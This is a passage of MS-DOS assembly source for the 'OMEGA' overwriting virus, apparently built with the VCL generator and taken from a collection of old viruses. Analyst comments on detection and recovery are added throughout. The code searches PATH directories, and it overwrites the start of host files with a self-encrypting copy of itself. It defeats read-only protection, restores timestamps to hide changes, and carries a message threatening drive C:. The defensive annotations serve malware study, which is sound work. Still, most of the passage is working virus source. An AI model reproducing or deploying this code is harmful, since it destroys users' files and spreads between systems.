
📄 omega1.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
		scasb				; Compare it to the environment
		jne	find_path		; If there not equal try again
		loop	check_next_4		; Otherwise keep checking

		mov	word ptr [path_ad],di	; Save the PATH address for later
		mov	word ptr [path_ad + 2],es  ; Save PATH's segment for later
		ret				; Return to caller

path_string	db	"PATH="			; The PATH string to search for
path_ad		dd	?			; Holds the PATH's address
traverse_path	endp

; found_subdir -- copy the next element of the PATH variable into a work buffer.
; Source is the far pointer saved in path_ad; destination is [bp - 70] with ES = CS.
; Copying stops at ';' (more elements follow) or at the terminating NUL (last element).
; No length limit is applied and no terminator is stored by this routine.
; On return the low word of path_ad holds the offset just past the ';', or 0 once the
; PATH is exhausted. DS still points at the PATH segment (the lds is not undone here).
; NOTE(review): BP is assumed to be a frame prepared by the caller -- not visible in this view.
; NOTE(review): presumably used to walk each PATH directory ahead of a file search, so
; affected files need not be in the current directory -- confirm against the caller.
found_subdir	proc	near
		lds	si,dword ptr [path_ad]	; DS:SI points to the PATH
		lea	di,[bp - 70]		; DI points to the work buffer
		push	cs			; Transfer CS into ES for
		pop	es			; byte transfer
move_subdir:	lodsb				; Load the next byte into AL
		cmp	al,';'			; Have we reached a separator?
		je	moved_one		; If so we're done copying
		or	al,al			; Are we finished with the PATH?
		je	moved_last_one		; If so get out of here
		stosb				; Store the byte at ES:DI
		jmp	short move_subdir	; Keep transfering characters

moved_last_one:	xor	si,si			; Zero SI to signal completion
moved_one:	mov	word ptr es:[path_ad],si; Store SI in the path address
		ret				; Return to caller
found_subdir	endp

; Five data bytes that nothing in this view references; they follow a RET, so they
; are not reached by fall-through. Presumably generator filler -- treat them as
; variable bytes when building signatures (TODO confirm).
		db	0BFh,0C0h,0BDh,072h,05Fh


; find_files -- enumerate files matching a mask and hand each one to infect_file.
; In:  DX = offset of the file mask (ASCIIZ), supplied by the caller.
; The current DTA offset is saved, a 128-byte stack buffer is installed as a private
; DTA for the search, and the saved DTA offset is reinstalled on exit. Only the offset
; returned in BX is saved; the segment returned in ES is not.
; The search attribute 00100111b asks DOS to include read-only, hidden, system and
; archive files, so those attributes do not keep a file out of the search.
; The loop ends when DOS reports no more matches, or as soon as infect_file returns
; with carry clear -- i.e. at most one file is modified per call.
find_files	proc	near
		push	bp			; Save BP

		mov	ah,02Fh			; DOS get DTA function
		int	021h
		push	bx			; Save old DTA address

		mov	bp,sp			; BP points to local buffer
		sub	sp,128			; Allocate 128 bytes on stack

		push	dx			; Save file mask
		mov	ah,01Ah			; DOS set DTA function
		lea	dx,[bp - 128]		; DX points to buffer
		int	021h

		mov	ah,04Eh			; DOS find first file function
		mov	cx,00100111b		; CX holds all file attributes
		pop	dx			; Restore file mask
find_a_file:	int	021h
		jc	done_finding		; Exit if no files found
		call	infect_file		; Infect the file!
		jnc	done_finding		; Exit if no error
		mov	ah,04Fh			; DOS find next file function
		jmp	short find_a_file	; Try finding another file

done_finding:	mov	sp,bp			; Restore old stack frame
		mov	ah,01Ah			; DOS set DTA function
		pop	dx			; Retrieve old DTA address
		int	021h

		pop	bp			; Restore BP
		ret				; Return to caller
find_files	endp

; Five unreferenced data bytes between procedures; presumably generator filler
; (TODO confirm). Not reached by fall-through, since the procedure above ends in RET.
		db	0A9h,06Bh,0DAh,081h,0AFh

; infect_file -- decide whether the file described by the current DTA is a target
; and, if so, overwrite it with an encrypted copy of this program.
; In:  current DTA holds a find-first/find-next result (attribute at +15h, time +16h,
;      date +18h, size +1Ah, ASCIIZ name +1Eh).
; Out: carry clear if the file was written, carry set if it was skipped.
;
; Behaviour relevant to detection and recovery, as visible in this routine:
;   * Files of 64 KB or more and files shorter than (finish - start) are skipped.
;   * The first four bytes are compared with `flag` (defined outside this view); a
;     match means "already modified" and the file is skipped. Those four bytes are
;     therefore a marker that identifies modified files.
;   * Attributes are cleared before the read/write open, so read-only does not protect.
;   * No seek is issued between the open and the write in encrypt_code, so the write
;     lands at file offset 0: the start of the host is overwritten, not appended to.
;     File size does not change and the original leading bytes are lost -- recovery
;     means restoring from backup, not disinfection.
;   * The original time, date and attributes are put back afterwards, so timestamps
;     and attributes cannot be used to spot modified files; compare content hashes.
infect_file	proc	near
		mov	ah,02Fh			; DOS get DTA address function
		int	021h
		mov	si,bx			; SI points to the DTA

		mov	byte ptr [set_carry],0	; Assume we'll fail

		cmp	word ptr [si + 01Ch],0	; Is the file > 65535 bytes?
		jne	infection_done		; If it is then exit

; NOTE(review): the found name starts at DTA+1Eh, so this word covers name bytes 7-8.
; Verify that it really matches COMMAND.COM before assuming that file is spared.
		cmp	word ptr [si + 025h],'DN'  ; Might this be COMMAND.COM?
		je	infection_done		; If it is then skip it

; Low word of the file size against the length of this program's image.
		cmp	word ptr [si + 01Ah],(finish - start)
		jb	infection_done		; If it's too small then exit

		mov	ax,03D00h		; DOS open file function, r/o
		lea	dx,[si + 01Eh]		; DX points to file name
		int	021h
		xchg	bx,ax			; BX holds file handle

		mov	ah,03Fh			; DOS read from file function
		mov	cx,4			; CX holds bytes to read (4)
		mov	dx,offset buffer	; DX points to buffer
		int	021h

		mov	ah,03Eh			; DOS close file function
		int	021h

		push	si			; Save DTA address before compare
		mov	si,offset buffer	; SI points to comparison buffer
		mov	di,offset flag		; DI points to virus flag
		mov	cx,4			; CX holds number of bytes (4)
	rep	cmpsb				; Compare the first four bytes
		pop	si			; Restore DTA address
		je	infection_done		; If equal then exit
		mov	byte ptr [set_carry],1	; Success -- the file is OK

		mov	ax,04301h		; DOS set file attrib. function
		xor	cx,cx			; Clear all attributes
		lea	dx,[si + 01Eh]		; DX points to victim's name
		int	021h

		mov	ax,03D02h		; DOS open file function, r/w
		int	021h
		xchg	bx,ax			; BX holds file handle

		push	si			; Save SI through call
		call	encrypt_code		; Write an encrypted copy
		pop	si			; Restore SI

; Put back the time and date recorded in the DTA before the write.
		mov	ax,05701h		; DOS set file time function
		mov	cx,[si + 016h]		; CX holds old file time
		mov	dx,[si + 018h]		; DX holds old file date
		int	021h

		mov	ah,03Eh			; DOS close file function
		int	021h

; Put back the attribute byte recorded in the DTA.
		mov	ax,04301h		; DOS set file attrib. function
		xor	ch,ch			; Clear CH for file attribute
		mov	cl,[si + 015h]		; CX holds file's old attributes
		lea	dx,[si + 01Eh]		; DX points to victim's name
		int	021h

; cmp sets carry when set_carry is 0 (file skipped) and clears it when set_carry is 1
; (file written); find_files stops on carry clear.
infection_done:	cmp	byte ptr [set_carry],1	; Set carry flag if failed
		ret				; Return to caller

buffer		db	4 dup (?)		; Buffer to hold test data
set_carry	db	?			; Set-carry-on-exit flag
infect_file	endp


; Five unreferenced data bytes between procedures; presumably generator filler
; (TODO confirm).
		db	0F1h,0F6h,003h,06Bh,099h

; get_day -- return the current day of the month in AX.
; DOS function 2Ah returns the day in DL; CX and DX are overwritten by the call.
; NOTE(review): callers are outside this view; date helpers like this are presumably
; inputs to an activation condition -- confirm where it is called.
get_day         proc	near
		mov	ah,02Ah			; DOS get date function
		int	021h
		mov	al,dl			; Copy day into AL
		cbw				; Sign-extend AL into AX
		ret				; Return to caller
get_day         endp

; Five unreferenced data bytes between procedures; presumably generator filler
; (TODO confirm).
		db	0CDh,005h,004h,026h,0CFh

; get_hour -- return the current hour in AX.
; DOS function 2Ch returns the hour in CH; CX and DX are overwritten by the call.
; NOTE(review): callers are outside this view; presumably an input to an activation
; condition -- confirm where it is called.
get_hour        proc	near
		mov	ah,02Ch			; DOS get time function
		int	021h
		mov	al,ch			; Copy hour into AL
		cbw				; Sign-extend AL into AX
		ret				; Return to caller
get_hour        endp

; Five unreferenced data bytes between procedures; presumably generator filler
; (TODO confirm).
		db	0F3h,06Ah,0F8h,002h,08Ah

; get_month -- return the current month in AX.
; DOS function 2Ah returns the month in DH; CX and DX are overwritten by the call.
; NOTE(review): callers are outside this view; presumably an input to an activation
; condition -- confirm where it is called.
get_month       proc	near
		mov	ah,02Ah			; DOS get date function
		int	021h
		mov	al,dh			; Copy month into AL
		cbw				; Sign-extend AL into AX
		ret				; Return to caller
get_month       endp

; Five unreferenced data bytes between procedures; presumably generator filler
; (TODO confirm).
		db	0A8h,000h,015h,081h,0E7h

; get_second -- return the seconds field of the current time in AX.
; DOS function 2Ch returns seconds in DH; CX and DX are overwritten by the call.
; NOTE(review): callers are outside this view; presumably an input to an activation
; condition -- confirm where it is called.
get_second      proc	near
		mov	ah,02Ch			; DOS get time function
		int	021h
		mov	al,dh			; Copy second into AL
		cbw				; Sign-extend AL into AX
		ret				; Return to caller
get_second      endp

; Five unreferenced data bytes between procedures; presumably generator filler
; (TODO confirm).
		db	03Fh,0FFh,089h,057h,0F2h

; get_year -- return the current year in AX.
; DOS function 2Ah returns the year in CX; the xchg moves it to AX and leaves the
; previous AX contents in CX. DX is overwritten by the call.
; NOTE(review): callers are outside this view; presumably an input to an activation
; condition -- confirm where it is called.
get_year        proc	near
		mov	ah,02Ah			; DOS get date function
		int	021h
		xchg	cx,ax			; Transfer the year into AX
		ret				; Return to caller
get_year        endp

; data00 -- message text; the code that displays it is outside this view.
; The wording ("Your C drive is being raptured!") suggests the payload acts on drive C:,
; but that cannot be confirmed from this listing.
; These literals and the "[VCL]" marker below are usable as static indicators only on a
; sample whose body is in clear. They sit before the end_of_code label, so presumably
; inside the XORed region -- in files written with a non-zero key they will not appear
; as plain text (confirm against start_of_code on the previous page).
; NOTE(review): the second string below has no closing quote as shown; likely a defect
; in the listing rather than in the assembled sample.
data00:
db        "Says the OMEGA virus:"
		
db                      "It has been nice playing these games with you,
db                              "...but now it is all over."
db              "[...I am the Alpha and the Omega, the begining and the end.]"
db                                                                "-Rev 22:6"
db              "Your C drive is being raptured!"
		
db                                      "[...It is finished...]"
db                                              "-Rev 16:17"
		
         
db                                              "____________"
db                                             "/            \"
db                                            "|              |"
db                                            "|              |" 
db                                            "|              |"
db                                      "\      \            /      /"
db                                        "\______\        /______/"
		
db                                               "Omega"
db                                                    "(The End)"

; Generator identification string; nothing in this view reads it.
vcl_marker	db	"[VCL]",0		; VCL creation marker

; encrypt_code -- write a newly keyed, XOR-encrypted copy of the image to an open file.
; In:  BX = file handle (set by infect_file just before the call).
; Steps visible here:
;   1. int 1Ah / AH=0 returns the BIOS tick count; its low word (DX) becomes the new
;      16-bit key and is stored at encrypt_decrypt+8, the immediate of the XOR there.
;   2. Bit 0 of the bytes at encrypt_decrypt+0, +7, +10 and +11 is flipped, which
;      switches the routine between its SI form and its DI form on each call.
;   3. A three-part sequence is assembled at `finish`, just past the image:
;      the cipher routine without its final RET, the 5-byte write_stuff fragment,
;      then the cipher routine again including the RET.
;   4. `call finish` with AH=40h and DX=offset start runs that sequence: XOR the body
;      in memory, write (finish - start) bytes through DOS, XOR the body back.
; No seek is issued here; the write goes to the handle's current position.
;
; Analyst notes: the cipher routine lies after end_of_code, so it is written in clear
; in every copy. Only its key word and bit 0 of the four patched bytes vary, which
; gives two routine encodings and a 16-bit key -- a byte signature for the routine
; needs wildcards at those positions only.
encrypt_code	proc	near
		mov	si,offset encrypt_decrypt; SI points to cipher routine

		xor	ah,ah			; BIOS get time function
		int	01Ah
		mov	word ptr [si + 8],dx	; Low word of timer is new key

		xor	byte ptr [si],1		;
		xor	byte ptr [si + 7],1	; Change all SIs to DIs
		xor	word ptr [si + 10],0101h; (and vice-versa)

		mov	di,offset finish	; Copy routine into heap
		mov	cx,finish - encrypt_decrypt - 1  ; All but final RET
		push	si			; Save SI for later
		push	cx			; Save CX for later
	rep	movsb				; Copy the bytes

		mov	si,offset write_stuff	; SI points to write stuff
		mov	cx,5			; CX holds length of write
	rep	movsb				; Copy the bytes

		pop	cx			; Restore CX
		pop	si			; Restore SI
		inc	cx			; Copy the RET also this time
	rep	movsb				; Copy the routine again

		mov	ah,040h			; DOS write to file function
		mov	dx,offset start		; DX points to virus

		call	finish			; Encrypt/write/decrypt

		ret				; Return to caller

; Template only: these two instructions are never executed in place (the RET above
; precedes them); their 5 bytes are copied into the sequence built at `finish`.
write_stuff:	mov	cx,finish - start	; Length of code
		int	021h
encrypt_code	endp

; end_of_code marks the end of the region that the cipher routine XORs. Everything
; from here to `finish` (the routine itself) is outside that region and so is stored
; in clear in every written copy.
end_of_code	label	near

; encrypt_decrypt -- XOR each 16-bit word from start_of_code up to end_of_code with a
; 16-bit key. XOR is its own inverse, so the same routine encrypts and decrypts.
; The XOR instruction is emitted as raw bytes (81h 34h = xor word ptr [si],imm16) so
; that encrypt_code can patch its immediate (the key, at offset +8) and its register
; encoding. The key is 0000h as assembled, so in this source form the loop leaves
; the body unchanged.
; The word count is (end_of_code - start_of_code) / 2; start_of_code is defined
; outside this view.
encrypt_decrypt	proc	near
		mov	si,offset start_of_code ; SI points to code to decrypt
		mov	cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop:	db	081h,034h,00h,00h	; XOR a word by the key
		inc	si			; Do the next word
		inc	si			;
		loop	xor_loop		; Loop until we're through
		ret				; Return to caller
encrypt_decrypt	endp
; `finish` marks the end of the image; encrypt_code uses the memory from this label
; onward as scratch space for the encrypt/write/decrypt sequence.
finish		label	near

code		ends
		end	main
